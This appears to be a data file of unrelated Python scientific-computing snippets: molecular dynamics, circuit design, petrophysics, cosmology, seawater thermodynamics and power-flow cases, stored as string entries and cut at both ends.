float((self.grid[j,k,l]/(sumagrid_subs[l]/(sumagrid_subs[0]+sumagrid_subs[1])))/(update_entropy*(self.grid[j,k,0]/(sumagrid_subs[0]/(sumagrid_subs[0]+sumagrid_subs[1])))+(self.grid[j,k,1]/(sumagrid_subs[1]/(sumagrid_subs[0]+sumagrid_subs[1])))))\r\n else:\r\n pji = 0\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji) #JV: We will only calculate the value when pji != 0\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n else:\r\n for j in range(self.G):\r\n for k in range(self.G):\r\n pji = float(self.grid[j,k,0])/(update_entropy*sumagrid)\r\n if(pji != 0):\r\n self.entropy_val += -pji*np.log(pji)\r\n\r\n self.entropy_val = self.entropy_val /(self.G**2)\r\n\r\n if(self.param[4] == \"Subsystems\"):\r\n self.grid = np.zeros([self.G,self.G,2])\r\n else:\r\n self.grid = np.zeros([self.G,self.G,2])\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n else:\r\n print(\"Computing with the Verlet algorithm\")\r\n\r\n #Generation of the precious position (backwards euler step)\r\n X1 = self.X\r\n Y1 = self.Y\r\n X0 = X1 - self.VX*dt\r\n Y0 = Y1 - self.VY*dt\r\n\r\n for self.i in range(0,self.n):\r\n #Call verlet to compute the next position\r\n X2,Y2 = self.verlet(t,dt,np.array([X0,Y0]),np.array([X1,Y1]))\r\n t = t + dt\r\n\r\n #Add the new positions to X,Y,VX,VY\r\n self.X = np.vstack((self.X,X2))\r\n self.Y = np.vstack((self.Y,Y2))\r\n self.VX = np.vstack((self.VX,(X2-X0)/(2*dt)))\r\n self.VY = np.vstack((self.VY,(Y2-Y0)/(2*dt)))\r\n\r\n #Redefine and repeat\r\n X0,Y0 = X1,Y1\r\n X1,Y1 = X2,Y2\r\n\r\n #Update and show progress through console\r\n progress = t/T*100\r\n if(self.i%1000 == 0):\r\n print(int(progress),'% done')\r\n\r\n #Once the computation has ended, I compute the kinetic energy,\r\n #the magnitude of the velocity V and the temperature\r\n #(see doc for temperature definition)\r\n self.KE()\r\n self.V = np.sqrt((self.VX**2 + self.VY**2))\r\n self.T = (np.sum(self.V**2,axis=1)/(self.particles.size*2 - 2))\r\n\r\n #Generation of the MB functions, you can modify the definition by\r\n #changing the linspace points\r\n vs,a = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n a,ts = np.meshgrid(np.linspace(0,self.V.max(),100),self.T)\r\n self.MB = (vs/(ts)*np.exp(-vs**2/(2*ts)))\r\n\r\n #JV: If we are on the Subsystems submenu, we will calculate the temperature and the MB distribution of both types of particles\r\n if(self.param[4] == \"Subsystems\"):\r\n\r\n #JV: 1st group of particles\r\n self.V1 = np.sqrt((self.VX[:,0:(self.param[5]**2)]**2 + self.VY[:,0:(self.param[5]**2)]**2))\r\n self.T1 = (np.sum(self.V1**2,axis=1)/((self.param[5]**2)*2 - 2))\r\n\r\n vs1,a1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n a1,ts1 = np.meshgrid(np.linspace(0,self.V1.max(),100),self.T1)\r\n self.MB1 = (vs1/(ts1)*np.exp(-vs1**2/(2*ts1)))\r\n\r\n #JV: 2nd group\r\n self.V2 = np.sqrt((self.VX[:,(self.param[5]**2):self.particles.size]**2 + self.VY[:,(self.param[5]**2):self.particles.size]**2))\r\n self.T2 = (np.sum(self.V2**2,axis=1)/((self.particles.size-self.param[5]**2)*2 - 2))\r\n\r\n vs2,a2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n a2,ts2 = np.meshgrid(np.linspace(0,self.V2.max(),100),self.T2)\r\n self.MB2 = (vs2/(ts2)*np.exp(-vs2**2/(2*ts2)))\r\n\r\n \"\"\"Here I generate the accumulated V,T and MB using lists, the reason I use lists is because if you append two numpy arrays\r\n to an empty numpy array, they merge instead of remaining separate. You could technically use splicing to save on memory\r\n but sacrificing cpu.\"\"\"\r\n\r\n self.Vacu = []\r\n self.Tacu = []\r\n self.MBacu = []\r\n self.Vacu.append(self.V[int(self.n/2),:])\r\n self.Tacu.append(np.sum(self.V[int(self.n/2),:]**2)/(self.particles.size*2 - 2))\r\n\r\n vs = np.linspace(0,self.V.max(),100)\r\n self.MBacu.append((vs/(self.Tacu[0])*np.exp(-vs**2/(2*self.Tacu[0]))))\r\n\r\n #This delta controls the time interval for accumulation, right now its every 5 units\r\n delta = 5./dt\r\n\r\n #This 40 that appers in these lines is the time from which I start accumulating\r\n #to ensure the system has reached equilibrium.\r\n for i in range(1,int((self.n-(40./dt))/delta)):\r\n self.Vacu.append(np.hstack((self.Vacu[i-1],self.V[int(40./dt)+int(i*delta),:])))\r\n self.Tacu.append(np.sum(self.Vacu[i]**2)/(self.Vacu[i].size*2 - 2))\r\n self.MBacu.append((vs/(self.Tacu[i])*np.exp(-vs**2/(2*self.Tacu[i]))))\r\n return", "def fig16():\n # fmt: off\n tpm = np.array([\n [0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [1, 0, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 0, 0, 0, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 1, 0, 0],\n [1, 1, 1, 1, 1, 0, 0],\n [1, 0, 1, 1, 1, 0, 0],\n [1, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 0],\n [0, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [1, 0, 0, 0, 0, 1, 0],\n [1, 0, 1, 0, 1, 1, 0],\n [1, 0, 1, 0, 0, 1, 0],\n [1, 0, 0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [0, 0, 0, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 0, 0, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 0],\n [1, 0, 1, 1, 1, 1, 0],\n [1, 1, 0, 1, 1, 1, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [1, 0, 0, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 1, 1],\n [1, 0, 1, 0, 0, 1, 1],\n [1, 0, 0, 0, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [0, 0, 0, 1, 1, 1, 1],\n [0, 0, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def calibration(N,kb,T,Ekinv,V):\n lamb = np.sqrt((N-1)*3*kb*T/(Ekinv*2))\n \n if lamb < 0.9999:\n V = lamb*V\n elif lamb>1.0001:\n V = lamb*V\n \n return V", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def design_TIA_inverter(db_n, db_p, sim_env,\n vg_res, rf_res,\n vdd_nom, vdd_vec, cpd, cload, \n rdc_min, fbw_min, pm_min, BER_max,\n vos, isw_pkpk,\n vb_n, vb_p, error_tol=0.05, ibias_max=20e-6):\n # Finds all possible designs for one value of VDD, then\n # confirm which work with all other VDD values.\n possibilities = []\n\n vg_vec = np.arange(0, vdd_nom, vg_res)\n \n for vg in vg_vec:\n print(\"VIN:\\t{0}\".format(vg))\n n_op_info = db_n.query(vgs=vg, vds=vg, vbs=vb_n-0)\n p_op_info = db_p.query(vgs=vg-vdd_nom, vds=vg-vdd_nom, vbs=vb_p-vdd_nom)\n \n if np.isinf(ibias_max):\n nf_n_max = 200\n else:\n nf_n_max = int(round(ibias_max/n_op_info['ibias']))\n \n nf_n_vec = np.arange(1, nf_n_max, 1)\n for nf_n in nf_n_vec:\n # Number of fingers can only be integer,\n # so increase as necessary until you get\n # sufficiently accurate/precise bias + current match\n ratio_good, nf_p = verify_ratio(n_op_info['ibias'],\n p_op_info['ibias'],\n nf_n,\n error_tol)\n if not ratio_good:\n continue\n\n # Getting small signal parameters to constrain Rf\n inv = LTICircuit()\n inv.add_transistor(n_op_info, 'out', 'in', 'gnd', fg=nf_n)\n inv.add_transistor(p_op_info, 'out', 'in', 'gnd', fg=nf_p)\n inv_num, inv_den = inv.get_num_den(in_name='in', out_name='out', in_type='v')\n A0 = abs(inv_num[-1]/inv_den[-1])\n \n gds_n = n_op_info['gds'] * nf_n\n gds_p = p_op_info['gds'] * nf_p\n gds = abs(gds_n) + abs(gds_p)\n ro = 1/gds\n \n # Assume Rdc is negative, bound Rf\n rf_min = max(rdc_min*(1+A0)/A0 + ro/A0, 0)\n rf_vec = np.arange(rf_min, rdc_min*2, rf_res)\n for rf in rf_vec:\n # With all parameters, check if it meets small signal spec\n meets_SS, SS_vals = verify_TIA_inverter_SS(n_op_info, p_op_info,\n nf_n, nf_p, rf, cpd, cload,\n rdc_min, fbw_min, pm_min)\n # With all parameters, estimate if it will meet noise spec\n meets_noise, BER = verify_TIA_inverter_BER(n_op_info, p_op_info, \n nf_n, nf_p,\n rf, cpd, cload,\n BER_max, vos, isw_pkpk)\n \n meets_spec = meets_SS # and meets_noise\n # If it meets small signal spec, append it to the list\n # of possibilities\n if meets_spec:\n possibilities.append(dict(vg=vg,\n vdd=vdd_nom,\n nf_n=nf_n,\n nf_p=nf_p,\n rf=rf,\n rdc=SS_vals['rdc'],\n fbw=SS_vals['fbw'],\n pm=SS_vals['pm'],\n ibias=ibias_n,\n BER=BER))\n elif SS_vals['fbw'] != None and SS_vals['fbw'] < fbw_min:\n # Increasing resistor size won't help bandwidth\n break\n \n # Go through all possibilities which work at the nominal voltage\n # and ensure functionality at other bias voltages\n # Remove any nonviable options\n print(\"{0} working at nominal VDD\".format(len(possibilities)))\n for candidate in possibilities:\n nf_n = candidate['nf_n']\n nf_p = candidate['nf_p']\n rf = candidate['rf']\n for vdd in vdd_vec:\n new_op_dict = vary_supply(vdd, db_n, db_p, nf_n, nf_p, vb_n, vb_p)\n vg = new_op_dict['vb']\n n_op = new_op_dict['n_op']\n p_op = new_op_dict['p_op']\n \n # Confirm small signal spec is met\n meets_SS, scratch = verify_TIA_inverter_SS(n_op, p_op,\n nf_n, nf_p, rf, cpd, cload,\n rdc_min, fbw_min, pm_min)\n \n # Confirm noise spec is met\n meets_noise, BER = verify_TIA_inverter_BER(n_op, p_op, \n nf_n, nf_p,\n rf, cpd, cload,\n BER_max, vos, isw_pkpk)\n \n meets_spec = meets_SS # and meets_noise\n \n if not meets_spec:\n possibilities.remove(candidate)\n break\n \n # Of the remaining possibilities, check for lowest power.\n # If there are none, raise a ValueError.\n if len(possibilities) == 0:\n raise ValueError(\"No final viable solutions\")\n \n print(\"{0} working at all VDD\".format(len(possibilities)))\n best_op = possibilities[0]\n for candidate in possibilities:\n best_op = choose_op_comparison(best_op, candidate)\n \n return best_op", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def estimate_ivec(nt, ft, v_matrix, vtv_matrix, eye=None):\n v_dim = v_matrix.shape[1]\n n_gauss = nt.shape[1]\n\n # Construct eye if necessary\n if eye is None:\n eye = Extractor.to_rfpf(np.eye(v_dim, dtype=v_matrix.dtype).T)\n\n it = eye.T.reshape((1, -1))\n vtvt = vtv_matrix.T.reshape((n_gauss, -1))\n\n b = np.dot(ft, v_matrix).T\n lt = np.dot(nt, vtvt) + it\n\n l = lt.reshape((vtv_matrix.shape[1], vtv_matrix.shape[0])).T\n\n out = Extractor.solve(l, b)\n\n return out", "def Phi_nu_mu1(self, E_nu, N=1e24):\n #check this \n try:\n phi = [0.]*len(E_nu)\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n for i, E_nu in enumerate(E_nu):\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n\n for j in range(Intervals):\n phi[i] += 1.6*N*quad(Int, IntegrationBoundary[j], IntegrationBoundary[j+1])[0]\n\n return np.array(phi)\n\n except TypeError as e:\n phi = 0.\n\n Int = lambda x: self.crossSection(x) * self.protonFlux(x) * self.F_nu_mu_1(E_nu/x, x) / x\n\n logE_min = np.log10(E_nu)\n logE_max = 10\n\n Intervals = int(np.ceil(logE_max-logE_min))\n IntegrationBoundary = np.logspace(logE_min, logE_max, Intervals+1)\n #print IntegrationBoundary\n for i in range(Intervals):\n phi += 1.6*N*quad(Int, IntegrationBoundary[i], IntegrationBoundary[i+1])[0]\n print (phi)\n\n return phi", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def N_TT_TE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_TE(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalTE(l2)\n result += self.F_TE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTT(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n\n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def enthalpy_SSO_0_p(p):\r\n v01 = 9.998420897506056e+2\r\n v05 = -6.698001071123802\r\n v08 = -3.988822378968490e-2\r\n v12 = -2.233269627352527e-2\r\n v15 = -1.806789763745328e-4\r\n v17 = -3.087032500374211e-7\r\n v20 = 1.550932729220080e-10\r\n v21 = 1.0\r\n v26 = -7.521448093615448e-3\r\n v31 = -3.303308871386421e-5\r\n v36 = 5.419326551148740e-6\r\n v37 = -2.742185394906099e-5\r\n v41 = -1.105097577149576e-7\r\n v43 = -1.119011592875110e-10\r\n v47 = -1.200507748551599e-15\r\n SSO = 35.16504\r\n a0 = v21 + SSO * (v26 + v36 * SSO + v31 * np.sqrt(SSO))\r\n a1 = v37 + v41 * SSO\r\n a2 = v43\r\n a3 = v47\r\n b0 = v01 + SSO * (v05 + v08 * np.sqrt(SSO))\r\n b1 = 0.5 * (v12 + v15 * SSO)\r\n b2 = v17 + v20 * SSO\r\n b1sq = b1 ** 2\r\n sqrt_disc = np.sqrt(b1sq - b0 * b2)\r\n N = a0 + (2 * a3 * b0 * b1 / b2 - a2 * b0) / b2\r\n M = a1 + (4 * a3 * b1sq / b2 - a3 * b0 - 2 * a2 * b1) / b2\r\n A = b1 - sqrt_disc\r\n B = b1 + sqrt_disc\r\n part = (N * b2 - M * b1) / (b2 * (B - A))\r\n db2Pascal = 10000.0\r\n return (db2Pascal * (p * (a2 - 2 * a3 * b1 / b2 + 0.5 * a3 * p) / b2 +\r\n (M / (2 * b2)) * np.log(1 + p * (2 * b1 + b2 * p) / b0) + part *\r\n np.log(1 + (b2 * p * (B - A)) / (A * (B + b2 * p)))))", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def test_compute_inventory():\n T = [1000]\n c_max = [1e20]\n time = 1e3\n inv, sig = divHretention.compute_inventory(T, c_max, time)\n assert len(inv) == len(sig)\n assert len(inv) == len(T)", "def e_step(self):\n # update VMF probabilities (Equation (3))\n logP = np.dot(self.features, self.mu.T)*self.kappa + np.log(self.pi).reshape(1,-1) # n by k\n logP_norm = logP - logsumexp(logP, axis=1).reshape(-1,1)\n self.p = np.exp(logP_norm)\n self.mllk = np.mean(logsumexp(logP, axis=1))", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 